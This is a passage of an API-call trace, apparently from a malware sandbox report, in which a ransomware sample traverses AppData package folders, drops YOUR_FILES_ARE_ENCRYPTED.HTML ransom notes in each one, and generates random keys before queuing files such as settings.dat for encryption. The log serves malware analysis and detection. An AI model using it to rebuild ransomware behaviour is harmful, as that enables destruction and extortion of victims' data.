hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x361ecea1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x361ecea1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x361ecea1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0114.991] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.991] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 180 [0114.991] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.991] lstrlenW (lpString=".LOG2") returned 5 [0114.991] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.991] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x361ecea1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x361ecea1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x361ecea1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187cf8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0114.991] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.991] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 185 [0114.991] GetProcessHeap () returned 0x600000 [0114.991] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\microsoft.appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.993] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.994] CloseHandle (hObject=0x320) returned 1 [0114.994] GetProcessHeap () returned 0x600000 [0114.994] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.994] GetProcessHeap () returned 0x600000 [0114.994] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.996] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x360bb815, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3636a2ee, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3636a2ee, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0114.996] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.996] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 169 [0114.996] GetProcessHeap () returned 0x600000 [0114.996] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\microsoft.appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.999] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.009] CloseHandle (hObject=0x32c) returned 1 [0115.009] GetProcessHeap () returned 0x600000 [0115.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.009] GetProcessHeap () returned 0x600000 [0115.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.010] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.010] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.010] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState") returned 98 [0115.010] GetProcessHeap () returned 0x600000 [0115.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.012] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState" [0115.012] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState\\*" [0115.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.012] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.012] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.012] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.012] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.012] GetProcessHeap () returned 0x600000 [0115.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.014] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.015] CloseHandle (hObject=0x32c) returned 1 [0115.015] GetProcessHeap () returned 0x600000 [0115.015] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.015] GetProcessHeap () returned 0x600000 [0115.015] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.016] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.016] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.016] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings") returned 94 [0115.016] GetProcessHeap () returned 0x600000 [0115.016] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.017] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings" [0115.017] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\*" [0115.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.018] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f462ea, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.018] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3405126d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3405126d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.018] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.018] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 107 [0115.018] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.018] lstrlenW (lpString=".lock") returned 5 [0115.018] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.018] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.018] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.018] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat") returned 107 [0115.018] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.018] lstrlenW (lpString=".dat") returned 4 [0115.018] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.018] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0115.019] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.019] GetProcessHeap () returned 0x600000 [0115.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.022] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="46") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="4C") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E5") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="2A") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="0C") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4E") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2A") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="20") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="37") returned 2 [0115.022] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A6") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="4D") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6B") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E2") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="B3") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="36") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="47") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="70") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F8") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="35") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="0C") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="61") returned 2 [0115.023] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B6") returned 2 [0115.023] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="8D") returned 2 [0115.023] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="01") returned 2 [0115.023] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B7") returned 2 [0115.023] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="60") returned 2 [0115.023] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="AE") returned 2 [0115.023] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4B") returned 2 [0115.023] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="78") returned 2 [0115.023] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="03") returned 2 [0115.023] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="04") returned 2 [0115.023] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="67") returned 2 [0115.024] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.024] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.024] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.025] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.026] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.026] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.026] GetProcessHeap () returned 0x600000 [0115.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.034] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.035] CloseHandle (hObject=0x324) returned 1 [0115.035] GetProcessHeap () returned 0x600000 [0115.035] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.035] GetProcessHeap () returned 0x600000 [0115.035] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.036] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f6c454, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.036] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.036] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData") returned 99 [0115.036] GetProcessHeap () returned 0x600000 [0115.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.037] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData" [0115.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData\\*" [0115.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f6c454, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.038] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f6c454, 